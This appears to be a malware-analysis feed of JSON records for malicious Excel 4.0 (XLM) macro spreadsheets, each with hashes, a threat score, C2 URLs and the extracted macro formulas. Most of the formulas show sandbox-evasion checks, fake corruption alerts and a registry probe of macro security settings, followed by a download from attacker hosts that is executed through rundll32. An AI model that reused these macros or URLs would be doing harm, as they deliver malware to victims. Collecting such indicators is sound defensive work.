{"version":"0.2","sample":{"sample":"","kind":"file","target":"19ab315af320e9aa737a3d96b5c4749b1631cc4e69839280806455c302cd4754"},"analysis":{"reported":"2020-04-09T16:15:07Z","score":10},"files":[{"filename":"19ab315af320e9aa737a3d96b5c4749b1631cc4e69839280806455c302cd4754","filesize":185344,"md5":"3f7024f846f39374d8090dfa342faa07","sha1":"5b38c4b68699127aec4239463ab1753bad6416a9","sha256":"19ab315af320e9aa737a3d96b5c4749b1631cc4e69839280806455c302cd4754","sha512":"2fbb6745d32b5ad049be44c2a5d1b3bea09b198dd4fed26adf43ec3529727ff12203ba3bb56c98fb584abd2e74081bc1f534167338a2cd0e84a3bb21b84aead8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"19ab315af320e9aa737a3d96b5c4749b1631cc4e69839280806455c302cd4754.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"19cf47d17a9cb7094210a1c44de336fa5a19e2c928e36047e30e87c2d7d7a517"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"19cf47d17a9cb7094210a1c44de336fa5a19e2c928e36047e30e87c2d7d7a517","filesize":116224,"md5":"c46d34cf0da953e79d41ec05f295aadb","sha1":"d7aa0770146cdf5faa2dcbfd2fe7e8955abcf448","sha256":"19cf47d17a9cb7094210a1c44de336fa5a19e2c928e36047e30e87c2d7d7a517","sha512":"4dfa55c57a5b498309438204125c6321b8c54cf811a3c8036eda615d40bd45ee515be923a22559a5265382dfa7f845ce9e131cc3aef2da19021052ba8fdba7be","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"19cf47d17a9cb7094210a1c44de336fa5a19e2c928e36047e30e87c2d7d7a517.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZOzqbpjQfH\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"19e5ee554105d281a9b8c8c5a94f0941390adaf543fb936f6abfe89fc45ab87e"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"19e5ee554105d281a9b8c8c5a94f0941390adaf543fb936f6abfe89fc45ab87e","filesize":144384,"md5":"2d628182e180895b36c767059ce49a96","sha1":"a334d9f626d1fd34f2c65928f2c4b7d081d0e941","sha256":"19e5ee554105d281a9b8c8c5a94f0941390adaf543fb936f6abfe89fc45ab87e","sha512":"bbd33be80e11d4ab4338be70a8eeba06fb4da048a16b20b86cd14de61a6213828406b119de8ea763362ce45e0ced60856ba5b3ee8d60d8c7a18f21d2016be906","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"19e5ee554105d281a9b8c8c5a94f0941390adaf543fb936f6abfe89fc45ab87e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"6z27ZroSOR\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"19e92f331ab21e6366296fb0ecd1f367842680bab286d589dc2b951682f4f862"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"19e92f331ab21e6366296fb0ecd1f367842680bab286d589dc2b951682f4f862","filesize":141312,"md5":"8ee10a50fc49d8f736fc2961bb207e26","sha1":"4d8cc117e7bbe4308196d35346b0fcd45f2d2e63","sha256":"19e92f331ab21e6366296fb0ecd1f367842680bab286d589dc2b951682f4f862","sha512":"40a972416cd38d11e32d5fc3220caf67752377c8d63cf540d400bb920c776c030175d61049c5b10d1e43eab0ad4c8f8cac54ec88cd41768ebaf3c8669e3e7194","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"19e92f331ab21e6366296fb0ecd1f367842680bab286d589dc2b951682f4f862.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"dnyg9GK6Ma\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"19f6c0e0806d9a79eb1af2dc70cdc024fed83358190a5d8bd2f1691476ad8e22"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"19f6c0e0806d9a79eb1af2dc70cdc024fed83358190a5d8bd2f1691476ad8e22","filesize":160768,"md5":"52313331c48e24d102a7fb2da3172ca5","sha1":"2c17078b9fc3f855e3d89ab7e83370e3f8e7f235","sha256":"19f6c0e0806d9a79eb1af2dc70cdc024fed83358190a5d8bd2f1691476ad8e22","sha512":"309391c5d61bac58e38b2bb88566f77879be214ee00e140fd8d66500890837da15a830e044bcee70e0426347461d867ee5b963a533383625b2d08eb454058b24","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"19f6c0e0806d9a79eb1af2dc70cdc024fed83358190a5d8bd2f1691476ad8e22.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"F4wkhdkiVp\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1a0e08248e3a6e053afc293482b48f1c2fe345cd863ed63cb279599ce8a099b8"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"1a0e08248e3a6e053afc293482b48f1c2fe345cd863ed63cb279599ce8a099b8","filesize":212992,"md5":"2f30deb7af3d72fb3187b5cc632c5b5d","sha1":"5ce0b68566753a5a7f8e8d9e54bbaf2ca35d7ef2","sha256":"1a0e08248e3a6e053afc293482b48f1c2fe345cd863ed63cb279599ce8a099b8","sha512":"c4827b1225360d16c75e6586b13b24197604c5f5832f9ea6a0d277354388ed649c0f57cec7611c43c1533c7d81386d22f283d9773ea12aa1051db363cadf2e22","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1a0e08248e3a6e053afc293482b48f1c2fe345cd863ed63cb279599ce8a099b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"voU4d5XpJq\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1a2bad7125aa3e6364fcf0e3eba2b9011ad20495af9a7c1d7c8525d86072496b"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"1a2bad7125aa3e6364fcf0e3eba2b9011ad20495af9a7c1d7c8525d86072496b","filesize":209920,"md5":"7e7b50b83cef9dfe4d00693299106d7f","sha1":"1a6f224b73a85f811d3660898d6d47ee74d3b87b","sha256":"1a2bad7125aa3e6364fcf0e3eba2b9011ad20495af9a7c1d7c8525d86072496b","sha512":"186f2fbf796f312ff95aa2aab047fa430d1f510e9067e8e43cb5371403edcee8fec7ce5fb062efaaa1a4549fc5d354af94c3d6288d4b05c0eec9ec5429103d87","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1a2bad7125aa3e6364fcf0e3eba2b9011ad20495af9a7c1d7c8525d86072496b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WF2KykJDLC\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1a3bff9d3e68a70a5edcff1abb692bb877de6efc57f9a9ec7921d3bc362b925c"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"1a3bff9d3e68a70a5edcff1abb692bb877de6efc57f9a9ec7921d3bc362b925c","filesize":209920,"md5":"7041b8ec5c7e73a2287a696642d40429","sha1":"18598fa186043492d82062a794e9d7e36641ad2e","sha256":"1a3bff9d3e68a70a5edcff1abb692bb877de6efc57f9a9ec7921d3bc362b925c","sha512":"667a68ebe7b1a1e7b55c2da46cc9c323205c66120c9ef9b5d35eb203ca4f1feb6c3a787696188de9e9c8320eb8029218d3fbf8c7e3047443710d3b476beb62ba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1a3bff9d3e68a70a5edcff1abb692bb877de6efc57f9a9ec7921d3bc362b925c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UCEC3bzOgj\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1a657c9f52ca86b007f0fad47cff9f1fe7bffddb892f274f2e127117410d95c2"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"1a657c9f52ca86b007f0fad47cff9f1fe7bffddb892f274f2e127117410d95c2","filesize":185344,"md5":"4baed8ef75727242d9d0d609b6b3cff8","sha1":"5130be0f4fd7a8d0a1e3766fe562cc9b82a19327","sha256":"1a657c9f52ca86b007f0fad47cff9f1fe7bffddb892f274f2e127117410d95c2","sha512":"e9e3f6681c741b4fc082cebfdeab446da7def47adf5f8a37e2162115bf93f7cd3ebe5de983656f612539464971b99b28e8e68d996faf738f892f5914ac7e10aa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1a657c9f52ca86b007f0fad47cff9f1fe7bffddb892f274f2e127117410d95c2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1a70e1e5bc4fbd9d7943aa8ad5191504801ccd985ee8b3a3961cc6d418209628"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"1a70e1e5bc4fbd9d7943aa8ad5191504801ccd985ee8b3a3961cc6d418209628","filesize":185344,"md5":"750fd5a85c36cf7720580018aa229a75","sha1":"1d5d73b7a291d0ee6e8ec8d916c31f83a08dcaa6","sha256":"1a70e1e5bc4fbd9d7943aa8ad5191504801ccd985ee8b3a3961cc6d418209628","sha512":"11f2f8037aa44d0099a6c67a4a2e657f49135d6bafc53a9c0c823f018f27d7ab13039d9033cb4248d0b2da6f386ec39ec94f4466beda499384fdd3497febc756","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1a70e1e5bc4fbd9d7943aa8ad5191504801ccd985ee8b3a3961cc6d418209628.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1a71295a613161dc90e6caaccc359cc3695d484ef449db9404caa834e8f478f9"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"1a71295a613161dc90e6caaccc359cc3695d484ef449db9404caa834e8f478f9","filesize":167936,"md5":"a5195370abe0cefd6a33f8b144c61345","sha1":"4ce98a9d37a629664ecc1c07631956c45b073407","sha256":"1a71295a613161dc90e6caaccc359cc3695d484ef449db9404caa834e8f478f9","sha512":"9c193c129e98cf9bbdf0248675940a3bf9fc8de3855c569465f596ca42e7d4641f935be9e06987ac37922095bd776a0020e89d1a5d26f24d40f43451ad12eda6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1a71295a613161dc90e6caaccc359cc3695d484ef449db9404caa834e8f478f9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"w3k5WMW8aE\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1aaf37f33f4f5e5fc2d2715f793922d85533be6a236c81aac766772204016490"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"1aaf37f33f4f5e5fc2d2715f793922d85533be6a236c81aac766772204016490","filesize":209920,"md5":"4ea61b38203d1e2c548dd932f07bc3f9","sha1":"af36079b77fc58d5f590ee589c627f3cced8b508","sha256":"1aaf37f33f4f5e5fc2d2715f793922d85533be6a236c81aac766772204016490","sha512":"0a3df24a7f065303af3f57ff768713e6fc57f9da946673bc43aad72d0eccab40c75a69effc00d42d65b7e8bd40eccd0fbe7b8bc0b81e0798a525c7d1d1222216","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1aaf37f33f4f5e5fc2d2715f793922d85533be6a236c81aac766772204016490.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"L99ssE4obG\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1ab8600d223dfd4f8b564616a59bb46c46684a5dd74267463a732a71e87f42f1"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"1ab8600d223dfd4f8b564616a59bb46c46684a5dd74267463a732a71e87f42f1","filesize":113152,"md5":"5c7d12ebf02751b9a970b7c4e19faf73","sha1":"f10915cac72ae8978eb29d58392814246072220e","sha256":"1ab8600d223dfd4f8b564616a59bb46c46684a5dd74267463a732a71e87f42f1","sha512":"2bdef5a3563b7b42d7cebe6fd02aee4b6934830c48c40858006427447e1f6b477d0a5f7b355d6fa77dcd30d2ffdd97fb5b010dfd51a3fc8a768d3bf996b2a4b6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1ab8600d223dfd4f8b564616a59bb46c46684a5dd74267463a732a71e87f42f1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/vdjfvfs7871f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"DgciAcrx5z\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1aba193b4d302a0f1779d5072a0888e30f613421771108a6ff38b4e6fce856a5"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"1aba193b4d302a0f1779d5072a0888e30f613421771108a6ff38b4e6fce856a5","filesize":116224,"md5":"64412cfbd9179f6daf21065d72d6368c","sha1":"2b17aaccbce0270e1cd907405213e0f5a3fe8ccc","sha256":"1aba193b4d302a0f1779d5072a0888e30f613421771108a6ff38b4e6fce856a5","sha512":"18ce02dfbc874eb86ab481ed0dca75a567603448263f9fa72b7c6c5260e3644ff85dfd22c28a28b1c0938785ae8205a17d3d16fb9ba504d5489bf1d81bdff335","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1aba193b4d302a0f1779d5072a0888e30f613421771108a6ff38b4e6fce856a5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zUZZxNTB0F\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1abbb39fd7bf87ac8496b4f7d876af0fd1e63129ee5b2c0275f3731619f8624a"},"analysis":{"reported":"2020-04-09T16:15:08Z","score":10},"files":[{"filename":"1abbb39fd7bf87ac8496b4f7d876af0fd1e63129ee5b2c0275f3731619f8624a","filesize":167936,"md5":"312d453d91d0f1bf58febd179fa8759d","sha1":"1f0e3da7dab81c8354aa1182a5fad624bd4b84cc","sha256":"1abbb39fd7bf87ac8496b4f7d876af0fd1e63129ee5b2c0275f3731619f8624a","sha512":"5f770b3138f038d14ab1a9f5229d13e519aa7c2483cac227d9e5cce3a85d86e053642815fd86c931871973e7fa88a6fe6f319215041e95550ccf595eae107a35","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1abbb39fd7bf87ac8496b4f7d876af0fd1e63129ee5b2c0275f3731619f8624a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gJ9N5nBLx0\",TRUE)\nGOTO(R$0C$19)"}}}]}
